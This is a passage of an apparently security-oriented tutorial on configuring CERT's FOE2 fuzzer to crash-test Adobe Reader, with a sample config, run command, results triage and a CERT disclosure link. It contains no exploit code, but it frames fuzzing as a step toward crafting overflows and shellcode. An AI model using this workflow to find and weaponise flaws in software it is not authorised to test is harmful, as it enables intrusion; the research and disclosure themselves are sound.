You can download FOE2 from the CERT Website [4]. I recommend installing FOE on a fully patched machine running Windows Vista, 7, or 8 (your preferred target). Also, download the latest version of the application you'd like to fuzz. In our case below, we can visit Adobe's site to download the latest version of Adobe Reader 11. Once you've got your machine configured with the software you wish to fuzz, FOE2 can be easily configured to launch against your application via its configuration files found in the /configs/ directory. Here we can set our campaign name, control the target application, and make adjustments to how the fuzzer operates. In order to test Adobe Reader, we must change the target application in our configuration file. Otherwise, you'll be testing an application that was installed alongside the FOE application.

foe.yaml
#####################################################################
# Fuzz target options:
#
# program: Path to fuzzing target executable (Adobe Reader below)
# cmdline_template: Used to specify the command-line invocation
# of the target
#####################################################################

target:
    program: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe
    cmdline_template: $PROGRAM $SEEDFILE NUL

Next, I'll find some seedfiles. There is nothing special about seedfiles, but you'll probably want to have at least one or two legitimate PDF files included in your seedfile directory. The configuration file can also be tuned to manipulate the seedfiles in different ways. It can be useful to play with these features as you execute different campaigns.

Once you've completed the steps above, running foe is as simple as:

C:\FOE2\>foe2.py --c configs\foe.yaml

FOE will feed Adobe Reader random input until you stop it or it breaks the virtual machine.  This process can last for weeks depending on your settings. To view the results, simply browse to the FOE2\results directory. You can view the results while the fuzzer is running. If FOE was successful in crashing Adobe Reader, you'll see a folder in this directory with one of four names: "EXPLOITABLE", "PROBABLY_EXPLOITABLE", "PROBABLY_NOT_EXPLOITABLE", and "UNKNOWN". With any luck, you'll find some exploitable crash scenarios. In the future, I will document more advanced techniques for using FOE and its robust set of configuration options.

What's next?
Crafting the overflow, controlling EIP, and inserting shellcode. Next week, Juan Miguel Paredes will bring us an Introduction to Buffer Overflows and walk us through this process.

Disclosure 
CERT will accept vulnerability reports submitted through the following form and will work with the affected vendors: https://forms.cert.org/VulReport/


References


[1] IBM X-Force 2011 Trend and Risk Report: https://www-935.ibm.com/services/us/iss/xforce/trendreports/

[2] CERT/SEI. How to More Effectively Manage Vulnerabilities and the Attacks that Exploit them: http://www.cert.org/podcast/transcripts/20120925manion-transcript.pdf

[3] Secunia Yearly Report 2011: http://secunia.com/company/2011_yearly_report/

[4] FOE Scanner Download: http://www.cert.org/vuls/discovery/foe.html